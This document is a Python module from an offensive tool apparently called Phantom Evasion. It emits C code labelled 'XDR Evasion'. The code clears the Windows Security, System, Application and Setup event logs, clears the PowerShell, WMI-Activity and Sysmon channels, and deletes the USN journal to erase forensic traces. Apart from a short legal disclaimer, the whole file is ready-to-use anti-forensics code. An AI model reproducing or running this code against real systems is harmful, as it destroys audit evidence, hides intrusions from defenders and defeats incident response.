"""
Phantom Evasion - Windows Event Log Tampering

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_log_tampering() -> Dict[str, Any]:
    """Generate C code to clear Windows Event Logs via the native API.

    Uses ``OpenEventLogW`` + ``ClearEventLogW`` to clear:
        - Security
        - System
        - Application
        - Microsoft-Windows-PowerShell/Operational

    Also demonstrates the ``EvtClearLog`` (wevtapi) approach for channels
    not accessible via the legacy ``OpenEventLog`` API.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
#ifndef __PHANTOM_LOG_TAMPERING__
#define __PHANTOM_LOG_TAMPERING__
// Windows Event Log Tampering – generated by Phantom Evasion
// Layer 4 – XDR Evasion
// Clears selected Windows Event Log channels to remove forensic artefacts.

#include <windows.h>
#include <winevt.h>
#pragma comment(lib, "wevtapi.lib")

// ── Legacy OpenEventLog / ClearEventLog approach ─────────────────────────────
static void clear_legacy_log(const wchar_t *log_name) {
    HANDLE hLog = OpenEventLogW(NULL, log_name);
    if (hLog) {
        ClearEventLogW(hLog, NULL);  // NULL = do not save a backup
        CloseEventLog(hLog);
    }
}

static void clear_all_legacy_logs(void) {
    clear_legacy_log(L"Security");
    clear_legacy_log(L"System");
    clear_legacy_log(L"Application");
    clear_legacy_log(L"Setup");
}

// ── Modern EvtClearLog (wevtapi) approach ────────────────────────────────────
// Used for ETW provider channels (e.g. PowerShell, Sysmon, WMI-Activity)
static void clear_evt_channel(const wchar_t *channel_path) {
    // EvtClearLog: clears the named channel; second param is optional backup path.
    EvtClearLog(NULL, channel_path, NULL, 0);
}

static void clear_powershell_logs(void) {
    clear_evt_channel(L"Microsoft-Windows-PowerShell/Operational");
    clear_evt_channel(L"Windows PowerShell");
    clear_evt_channel(L"Microsoft-Windows-WMI-Activity/Operational");
    clear_evt_channel(L"Microsoft-Windows-Sysmon/Operational");
}

// ── USN Journal truncation (file-system forensics) ───────────────────────────
// Deletes and recreates the USN journal to erase recent file-system activity.
static void purge_usn_journal(void) {
    HANDLE hVol = CreateFileW(L"\\\\.\\C:",
                               GENERIC_READ | GENERIC_WRITE,
                               FILE_SHARE_READ | FILE_SHARE_WRITE,
                               NULL, OPEN_EXISTING, 0, NULL);
    if (hVol == INVALID_HANDLE_VALUE) return;

    DELETE_USN_JOURNAL_DATA del = { 0, USN_DELETE_FLAG_DELETE };
    DWORD bytes_returned = 0;
    DeviceIoControl(hVol, FSCTL_DELETE_USN_JOURNAL,
                    &del, sizeof(del), NULL, 0, &bytes_returned, NULL);
    CloseHandle(hVol);
}

// ── Master log-clearing routine ───────────────────────────────────────────────
static void clear_all_logs(void) {
    clear_all_legacy_logs();
    clear_powershell_logs();
    purge_usn_journal();
}
#endif /* __PHANTOM_LOG_TAMPERING__ */
"""

    return {
        "code": code,
        "description": "Clear Windows Event Logs (Security/System/Application + PowerShell/Sysmon) and USN journal",
        "layer": "Layer 4 - XDR Evasion",
        "name": "log_tampering",
    }
